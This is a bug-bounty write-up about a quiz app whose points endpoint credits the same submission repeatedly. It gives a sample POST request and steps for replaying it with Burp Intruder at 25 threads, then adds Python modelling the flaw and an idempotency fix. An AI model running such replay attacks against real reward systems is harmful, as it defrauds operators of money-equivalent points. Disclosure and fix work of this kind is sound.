Case Study
As this was a private program, all illustrations of the vulnerability use example.com as the host.
The application is built to play quizzes and win reward points that can be used as money to play more quizzes.
example: 10 reward points = 1 Rs
To play a quiz you need to pay Rs 5, or you can pay 50 reward points, and so on. When registering you get 50 reward points for a first-time signup. There is also one free quiz per day where you can earn points.
example: 5 correct answers = 5 points, 10 correct answers = 10 points
The minimum number of correct answers needed to get reward points is 5.
POC
Let's select a free quiz to earn some points. I managed to get 5 correct answers and was awarded 5 points.
HTTP request that takes your answers:
POST /endpoint HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.7
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
Cookie:
Upgrade-Insecure-Requests: 1
csrf_test_name=SOME_ID&contestId=MY_ID&stage=SOME_RANDOM_ID&timeTaken=[ARRAY,TO,COLLECT,TIME ]&questionChoosen=[ ARRAY, OF , ANSWER, EXAMPLE, 1,2,2,3,4 ]&questionTime=["Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz","Mzk4MTA5ODA2NDQz"]&ans=on
Intercept the request and send it to Intruder.
Now increase the threads to 25, select the Null payload type in Intruder, and set the payload count to the number of times you want the reward points to increase.
Done.
There is no check whether the quiz has already been played. They are just checking the number of right answers and awarding points, so the same submission can be replayed and credited again and again.
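To show why the replay works and what the fix looks like, here is an added example (not the application's code; the handler logic is my reconstruction of what the write-up describes, and the answer key, contestId "MY_ID" and the Account class are constructed). It replays one identical submission from 25 threads against a handler that only counts correct answers, and against one that records the contestId per account under a lock before crediting.

```python
import threading
from dataclasses import dataclass, field

MIN_CORRECT = 5  # from the write-up: fewer than 5 correct answers earns nothing


@dataclass
class Account:
    points: int = 0
    played: set = field(default_factory=set)  # contestIds already credited
    lock: threading.Lock = field(default_factory=threading.Lock)


def score(chosen, answer_key):
    """Number of correct answers (the only thing the original endpoint checked)."""
    return sum(c == k for c, k in zip(chosen, answer_key))


def award_vulnerable(acct, contest_id, chosen, answer_key):
    # Assumed reconstruction of the described logic: count correct answers,
    # credit points, and never record that this contest was already played.
    correct = score(chosen, answer_key)
    if correct >= MIN_CORRECT:
        acct.points += correct
    return correct


def award_fixed(acct, contest_id, chosen, answer_key):
    correct = score(chosen, answer_key)
    with acct.lock:                    # one submission at a time per account
        if contest_id in acct.played:  # idempotency: credit each contest once
            return 0
        acct.played.add(contest_id)    # record the play *before* crediting
        if correct >= MIN_CORRECT:
            acct.points += correct
    return correct


def replay(handler, threads=25):
    """Replay one identical submission from `threads` threads, Intruder-style."""
    acct = Account()
    answer_key = [1, 2, 2, 3, 4, 1, 3, 2, 4, 1]   # constructed sample key
    chosen = [1, 2, 2, 3, 4, 0, 0, 0, 0, 0]      # exactly 5 correct answers
    workers = [threading.Thread(target=handler,
                                args=(acct, "MY_ID", chosen, answer_key))
               for _ in range(threads)]
    for w in workers:
        w.start()
    for w in workers:
        w.join()
    return acct.points  # vulnerable: 5 per replay; fixed: 5 in total
```

In a real deployment the `played` set is a per-user table with a unique constraint on (user, contestId) and the lock is the database transaction that inserts that row before the points are credited.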
For queries, ping me on:
Twitter : https://twitter.com/wisdomfreak1
LinkedIn: https://www.linkedin.com/in/saddam-hussain-01766a148/